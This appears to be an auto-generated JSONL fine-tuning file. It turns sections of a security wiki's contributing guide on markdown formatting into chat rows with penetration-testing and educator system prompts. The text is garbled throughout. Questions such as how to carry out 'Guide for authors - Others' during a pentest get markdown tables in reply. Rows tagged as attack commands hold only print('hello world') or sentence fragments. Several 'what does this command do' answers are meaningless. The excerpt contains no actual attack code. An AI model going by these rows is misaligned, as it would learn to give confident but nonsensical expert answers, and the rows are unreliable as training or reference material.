numbers, code groups. \n\nBut it can be as simple as that:\n\n```\n`python\nprint('hello world')\n`\n``\n\nGiving the following output\n\n`python\nprint('hello world')\n``\n\n---", "metadata": {"corpus_index": 1334, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Guide for authors 📝 - Code"}, {"role": "assistant", "content": "```python\nprint('hello world')"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Guide for authors 📝 - Code", "response": "```python\nprint('hello world')", "metadata": {"corpus_index": 1335, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: ````python`?"}, {"role": "assistant", "content": "This command is used for guide for authors 📝 - code. Code"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: ````python`?", "response": "This command is used for guide for authors 📝 - code. Code", "metadata": {"corpus_index": 1335, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the Giving command to guide for authors 📝 - code"}, {"role": "assistant", "content": "Giving the following output"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the Giving command to guide for authors 📝 - code", "response": "Giving the following output", "metadata": {"corpus_index": 1336, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Giving"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Guide for authors 📝 - Code"}, {"role": "assistant", "content": "Giving the following output"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Guide for authors 📝 - Code", "response": "Giving the following output", "metadata": {"corpus_index": 1336, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Giving the following output`?"}, {"role": "assistant", "content": "This command is used for guide for authors 📝 - code. Code"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Giving the following output`?", "response": "This command is used for guide for authors 📝 - code. Code", "metadata": {"corpus_index": 1336, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Guide for authors 📝 - Tabs in the context of penetration testing"}, {"role": "assistant", "content": "Input\n\n``markdown\n== tab a\n\nSome content\n\n== tab b\n\nb content\n\n``\n\nOutput\n\n== tab a\n\nSome content\n\n== tab b\n\nb content\n\n---"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Guide for authors 📝 - Tabs in the context of penetration testing", "response": "Input\n\n``markdown\n== tab a\n\nSome content\n\n== tab b\n\nb content\n\n``\n\nOutput\n\n== tab a\n\nSome content\n\n== tab b\n\nb content\n\n---", "metadata": {"corpus_index": 1337, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Guide for authors 📝 - Tabs"}, {"role": "assistant", "content": "Input\n\n``markdown\n== tab a\n\nSome content\n\n== tab b\n\nb content\n\n``\n\nOutput\n\n== tab a\n\nSome content\n\n== tab b\n\nb content\n\n---"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Guide for authors 📝 - Tabs", "response": "Input\n\n``markdown\n== tab a\n\nSome content\n\n== tab b\n\nb content\n\n``\n\nOutput\n\n== tab a\n\nSome content\n\n== tab b\n\nb content\n\n---", "metadata": {"corpus_index": 1337, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Guide for authors 📝 - Callouts?"}, {"role": "assistant", "content": "THR uses GitHub-flavored alerts to render most callouts. The most common callouts in The Hacker Recipes are:\n\n> [!NOTE] NOTE\n> Note from the author, not critical to the main content. To clarify, offer references, add content or background.\n\n> [!TIP] TIP\n> Offer helpful advice or best practices. Providing shortcuts or expert recommandations.\n\n> [!WARNING] WARNING\n> Alert the reader to potential dangers. Provide OPSEC advice.\n\n> [!CAUTION] CAUTION\n> When there's critical information the reader needs to be aware of.\n\n> [!SUCCESS] SUCCESS\n> When the author wants to highlight a successful outcome or scenario.\n\n::: details\nDetails blocks can also be used\n:::\n\nThe input for this goes like this:\n\n``markdown\n> [!NOTE] NOTE\n> Note from the author, not critical to the main content. To clarify, offer references, add content or background.\n\n> [!TIP] TIP\n> Offer helpful advice or best practices. Providing shortcuts or expert recommandations.\n\n> [!WARNING] WARNING\n> Alert the reader to potential dangers. Provide OPSEC advice.\n\n> [!CAUTION] CAUTION\n> When there's critical information the reader needs to be aware of.\n\n> [!SUCCESS] SUCCESS\n> When the author wants to highlight a successful outcome or scenario.\n\n::: details\nDetails blocks can also be used\n:::\n`\n\n> [!NOTE]\n> The title of a callout is optional.\n> `\n> > [!NOTE]\n> The title of a callout is optional.\n> ``\n\n---"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Guide for authors 📝 - Callouts?", "response": "THR uses GitHub-flavored alerts to render most callouts. The most common callouts in The Hacker Recipes are:\n\n> [!NOTE] NOTE\n> Note from the author, not critical to the main content. To clarify, offer references, add content or background.\n\n> [!TIP] TIP\n> Offer helpful advice or best practices. Providing shortcuts or expert recommandations.\n\n> [!WARNING] WARNING\n> Alert the reader to potential dangers. Provide OPSEC advice.\n\n> [!CAUTION] CAUTION\n> When there's critical information the reader needs to be aware of.\n\n> [!SUCCESS] SUCCESS\n> When the author wants to highlight a successful outcome or scenario.\n\n::: details\nDetails blocks can also be used\n:::\n\nThe input for this goes like this:\n\n``markdown\n> [!NOTE] NOTE\n> Note from the author, not critical to the main content. To clarify, offer references, add content or background.\n\n> [!TIP] TIP\n> Offer helpful advice or best practices. Providing shortcuts or expert recommandations.\n\n> [!WARNING] WARNING\n> Alert the reader to potential dangers. Provide OPSEC advice.\n\n> [!CAUTION] CAUTION\n> When there's critical information the reader needs to be aware of.\n\n> [!SUCCESS] SUCCESS\n> When the author wants to highlight a successful outcome or scenario.\n\n::: details\nDetails blocks can also be used\n:::\n`\n\n> [!NOTE]\n> The title of a callout is optional.\n> `\n> > [!NOTE]\n> The title of a callout is optional.\n> ``\n\n---", "metadata": {"corpus_index": 1338, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Guide for authors 📝 - Callouts"}, {"role": "assistant", "content": "THR uses GitHub-flavored alerts to render most callouts. The most common callouts in The Hacker Recipes are:\n\n> [!NOTE] NOTE\n> Note from the author, not critical to the main content. To clarify, offer references, add content or background.\n\n> [!TIP] TIP\n> Offer helpful advice or best practices. Providing shortcuts or expert recommandations.\n\n> [!WARNING] WARNING\n> Alert the reader to potential dangers. Provide OPSEC advice.\n\n> [!CAUTION] CAUTION\n> When there's critical information the reader needs to be aware of.\n\n> [!SUCCESS] SUCCESS\n> When the author wants to highlight a successful outcome or scenario.\n\n::: details\nDetails blocks can also be used\n:::\n\nThe input for this goes like this:\n\n``markdown\n> [!NOTE] NOTE\n> Note from the author, not critical to the main content. To clarify, offer references, add content or background.\n\n> [!TIP] TIP\n> Offer helpful advice or best practices. Providing shortcuts or expert recommandations.\n\n> [!WARNING] WARNING\n> Alert the reader to potential dangers. Provide OPSEC advice.\n\n> [!CAUTION] CAUTION\n> When there's critical information the reader needs to be aware of.\n\n> [!SUCCESS] SUCCESS\n> When the author wants to highlight a successful outcome or scenario.\n\n::: details\nDetails blocks can also be used\n:::\n`\n\n> [!NOTE]\n> The title of a callout is optional.\n> `\n> > [!NOTE]\n> The title of a callout is optional.\n> ``\n\n---"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Guide for authors 📝 - Callouts", "response": "THR uses GitHub-flavored alerts to render most callouts. The most common callouts in The Hacker Recipes are:\n\n> [!NOTE] NOTE\n> Note from the author, not critical to the main content. To clarify, offer references, add content or background.\n\n> [!TIP] TIP\n> Offer helpful advice or best practices. Providing shortcuts or expert recommandations.\n\n> [!WARNING] WARNING\n> Alert the reader to potential dangers. Provide OPSEC advice.\n\n> [!CAUTION] CAUTION\n> When there's critical information the reader needs to be aware of.\n\n> [!SUCCESS] SUCCESS\n> When the author wants to highlight a successful outcome or scenario.\n\n::: details\nDetails blocks can also be used\n:::\n\nThe input for this goes like this:\n\n``markdown\n> [!NOTE] NOTE\n> Note from the author, not critical to the main content. To clarify, offer references, add content or background.\n\n> [!TIP] TIP\n> Offer helpful advice or best practices. Providing shortcuts or expert recommandations.\n\n> [!WARNING] WARNING\n> Alert the reader to potential dangers. Provide OPSEC advice.\n\n> [!CAUTION] CAUTION\n> When there's critical information the reader needs to be aware of.\n\n> [!SUCCESS] SUCCESS\n> When the author wants to highlight a successful outcome or scenario.\n\n::: details\nDetails blocks can also be used\n:::\n`\n\n> [!NOTE]\n> The title of a callout is optional.\n> `\n> > [!NOTE]\n> The title of a callout is optional.\n> ``\n\n---", "metadata": {"corpus_index": 1338, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Guide for authors 📝 - Images and links?"}, {"role": "assistant", "content": "As simple as title for links and ![](path/to/image) for images.\n\n> [!TIP]\n> If there are spaces in the image path, either spaces need to be URL-encded (%20), or the following structure can be used (recommended):\n> ![]()\n\nImages can also be given a caption\n\n``markdown\n![](path/to/image)\nSome caption{.caption}\n`\nWhich will output the following\n\n![](https://developers.elementor.com/docs/assets/img/elementor-placeholder-image.png)\nSome caption{.caption}\n\nTo embed a YouTube link, use the following tag format:\n\n`\n> [!YOUTUBE] https://www.youtube.com/watch?v=example\n``\n\nThis will create a clickable link that directs users to the specified YouTube video. \n\nWhich will output the following\n\n> [!YOUTUBE] https://www.youtube.com/watch?v=dQw4w9WgXcQ\n\n> [!WARNING] \n> Ensure you provide the full YouTube link, as using a shortened link will cause the tag to malfunction."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Guide for authors 📝 - Images and links?", "response": "As simple as title for links and ![](path/to/image) for images.\n\n> [!TIP]\n> If there are spaces in the image path, either spaces need to be URL-encded (%20), or the following structure can be used (recommended):\n> ![]()\n\nImages can also be given a caption\n\n``markdown\n![](path/to/image)\nSome caption{.caption}\n`\nWhich will output the following\n\n![](https://developers.elementor.com/docs/assets/img/elementor-placeholder-image.png)\nSome caption{.caption}\n\nTo embed a YouTube link, use the following tag format:\n\n`\n> [!YOUTUBE] https://www.youtube.com/watch?v=example\n``\n\nThis will create a clickable link that directs users to the specified YouTube video. \n\nWhich will output the following\n\n> [!YOUTUBE] https://www.youtube.com/watch?v=dQw4w9WgXcQ\n\n> [!WARNING] \n> Ensure you provide the full YouTube link, as using a shortened link will cause the tag to malfunction.", "metadata": {"corpus_index": 1339, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Guide for authors 📝 - Images and links?"}, {"role": "assistant", "content": "As simple as title for links and ![](path/to/image) for images.\n\n> [!TIP]\n> If there are spaces in the image path, either spaces need to be URL-encded (%20), or the following structure can be used (recommended):\n> ![]()\n\nImages can also be given a caption\n\n``markdown\n![](path/to/image)\nSome caption{.caption}\n`\nWhich will output the following\n\n![](https://developers.elementor.com/docs/assets/img/elementor-placeholder-image.png)\nSome caption{.caption}\n\nTo embed a YouTube link, use the following tag format:\n\n`\n> [!YOUTUBE] https://www.youtube.com/watch?v=example\n``\n\nThis will create a clickable link that directs users to the specified YouTube video. \n\nWhich will output the following\n\n> [!YOUTUBE] https://www.youtube.com/watch?v=dQw4w9WgXcQ\n\n> [!WARNING] \n> Ensure you provide the full YouTube link, as using a shortened link will cause the tag to malfunction."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Guide for authors 📝 - Images and links?", "response": "As simple as title for links and ![](path/to/image) for images.\n\n> [!TIP]\n> If there are spaces in the image path, either spaces need to be URL-encded (%20), or the following structure can be used (recommended):\n> ![]()\n\nImages can also be given a caption\n\n``markdown\n![](path/to/image)\nSome caption{.caption}\n`\nWhich will output the following\n\n![](https://developers.elementor.com/docs/assets/img/elementor-placeholder-image.png)\nSome caption{.caption}\n\nTo embed a YouTube link, use the following tag format:\n\n`\n> [!YOUTUBE] https://www.youtube.com/watch?v=example\n``\n\nThis will create a clickable link that directs users to the specified YouTube video. \n\nWhich will output the following\n\n> [!YOUTUBE] https://www.youtube.com/watch?v=dQw4w9WgXcQ\n\n> [!WARNING] \n> Ensure you provide the full YouTube link, as using a shortened link will cause the tag to malfunction.", "metadata": {"corpus_index": 1339, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Guide for authors 📝 - Images and links?"}, {"role": "assistant", "content": "> [!YOUTUBE] https://www.youtube.com/watch?v=example"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Guide for authors 📝 - Images and links?", "response": "> [!YOUTUBE] https://www.youtube.com/watch?v=example", "metadata": {"corpus_index": 1340, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `> [!YOUTUBE] https://www.youtube.com/watch?v=example`?"}, {"role": "assistant", "content": "This command is used for guide for authors 📝 - images and links. Images and links"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `> [!YOUTUBE] https://www.youtube.com/watch?v=example`?", "response": "This command is used for guide for authors 📝 - images and links. Images and links", "metadata": {"corpus_index": 1340, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Guide for authors 📝 - Others"}, {"role": "assistant", "content": "| Block | Description |\n|--------------------------------------------------------------------|---------------------------------------------------------|\n| Links | Internal links (to other articles, or to anchor points) |\n| Tables | Tables (like this one) |\n| Emojis | Emojis :tada: |"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Guide for authors 📝 - Others", "response": "| Block | Description |\n|--------------------------------------------------------------------|---------------------------------------------------------|\n| Links | Internal links (to other articles, or to anchor points) |\n| Tables | Tables (like this one) |\n| Emojis | Emojis :tada: |", "metadata": {"corpus_index": 1341, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Guide for authors 📝 - Others during a pentest?"}, {"role": "assistant", "content": "| Block | Description |\n|--------------------------------------------------------------------|---------------------------------------------------------|\n| Links | Internal links (to other articles, or to anchor points) |\n| Tables | Tables (like this one) |\n| Emojis | Emojis :tada: |"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Guide for authors 📝 - Others during a pentest?", "response": "| Block | Description |\n|--------------------------------------------------------------------|---------------------------------------------------------|\n| Links | Internal links (to other articles, or to anchor points) |\n| Tables | Tables (like this one) |\n| Emojis | Emojis :tada: |", "metadata": {"corpus_index": 1341, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Guide for authors 📝 - Quotes work?"}, {"role": "assistant", "content": "> \"Someone said something important and it should be highlighted in the article? Please quote it and attribute it to the initial author.\"\n> \n> _(Author, date, source)_\n\n``markdown\n> \"Someone said something important and it should be highlighted in the article? Please quote it and attribute it to the initial author.\"\n> \n> _(Author, date, source)_\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Guide for authors 📝 - Quotes work?", "response": "> \"Someone said something important and it should be highlighted in the article? Please quote it and attribute it to the initial author.\"\n> \n> _(Author, date, source)_\n\n``markdown\n> \"Someone said something important and it should be highlighted in the article? Please quote it and attribute it to the initial author.\"\n> \n> _(Author, date, source)_\n``", "metadata": {"corpus_index": 1342, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Guide for authors 📝 - Quotes?"}, {"role": "assistant", "content": "> \"Someone said something important and it should be highlighted in the article? Please quote it and attribute it to the initial author.\"\n> \n> _(Author, date, source)_\n\n``markdown\n> \"Someone said something important and it should be highlighted in the article? Please quote it and attribute it to the initial author.\"\n> \n> _(Author, date, source)_\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Guide for authors 📝 - Quotes?", "response": "> \"Someone said something important and it should be highlighted in the article? Please quote it and attribute it to the initial author.\"\n> \n> _(Author, date, source)_\n\n``markdown\n> \"Someone said something important and it should be highlighted in the article? Please quote it and attribute it to the initial author.\"\n> \n> _(Author, date, source)_\n``", "metadata": {"corpus_index": 1342, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Guide for authors 📝 - Article template?"}, {"role": "assistant", "content": "An article template is available for a quick start: Template."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Guide for authors 📝 - Article template?", "response": "An article template is available for a quick start: Template.", "metadata": {"corpus_index": 1343, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Guide for authors 📝 - Article template"}, {"role": "assistant", "content": "An article template is available for a quick start: Template."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Guide for authors 📝 - Article template", "response": "An article template is available for a quick start: Template.", "metadata": {"corpus_index": 1343, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Guide for authors 📝 - Highlighting contributors?"}, {"role": "assistant", "content": "For contributors to be listed, they need to be listed in the authors property of the frontmatter configuration of the corresponding page(s).\n\nWhen contributing to a page, an author must add its GitHub username to it:\n\n``markdown\n---\nauthors: author1, author2, ...\n---\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Guide for authors 📝 - Highlighting contributors?", "response": "For contributors to be listed, they need to be listed in the authors property of the frontmatter configuration of the corresponding page(s).\n\nWhen contributing to a page, an author must add its GitHub username to it:\n\n``markdown\n---\nauthors: author1, author2, ...\n---\n``", "metadata": {"corpus_index": 1344, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Guide for authors 📝 - Highlighting contributors?"}, {"role": "assistant", "content": "For contributors to be listed, they need to be listed in the authors property of the frontmatter configuration of the corresponding page(s).\n\nWhen contributing to a page, an author must add its GitHub username to it:\n\n``markdown\n---\nauthors: author1, author2, ...\n---\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Guide for authors 📝 - Highlighting contributors?", "response": "For contributors to be listed, they need to be listed in the authors property of the frontmatter configuration of the corresponding page(s).\n\nWhen contributing to a page, an author must add its GitHub username to it:\n\n``markdown\n---\nauthors: author1, author2, ...\n---\n``", "metadata": {"corpus_index": 1344, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Guide for authors 📝 - Category attribute"}, {"role": "assistant", "content": "It is mandatory to specify the category of the article in the frontmatter configuration of the page (it can be ad, infra, web, etc.).\n\n``markdown\n---\ncategory: ad\n---\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Guide for authors 📝 - Category attribute", "response": "It is mandatory to specify the category of the article in the frontmatter configuration of the page (it can be ad, infra, web, etc.).\n\n``markdown\n---\ncategory: ad\n---\n``", "metadata": {"corpus_index": 1345, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Guide for authors 📝 - Category attribute"}, {"role": "assistant", "content": "It is mandatory to specify the category of the article in the frontmatter configuration of the page (it can be ad, infra, web, etc.).\n\n``markdown\n---\ncategory: ad\n---\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Guide for authors 📝 - Category attribute", "response": "It is mandatory to specify the category of the article in the frontmatter configuration of the page (it can be ad, infra, web, etc.).\n\n``markdown\n---\ncategory: ad\n---\n``", "metadata": {"corpus_index": 1345, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Guide for authors 📝 - Variable commands?"}, {"role": "assistant", "content": "When adding or editing content, please use the standardized variable names listed above to ensure a consistent experience across all documentation pages for variable commands"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Guide for authors 📝 - Variable commands?", "response": "When adding or editing content, please use the standardized variable names listed above to ensure a consistent experience across all documentation pages for variable commands", "metadata": {"corpus_index": 1346, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Guide for authors 📝 - Variable commands?"}, {"role": "assistant", "content": "When adding or editing content, please use the standardized variable names listed above to ensure a consistent experience across all documentation pages for variable commands"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Guide for authors 📝 - Variable commands?", "response": "When adding or editing content, please use the standardized variable names listed above to ensure a consistent experience across all documentation pages for variable commands", "metadata": {"corpus_index": 1346, "category": "linux", "source_file": "docs/src/contributing/write.md", "page_title": "Guide for authors 📝", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should 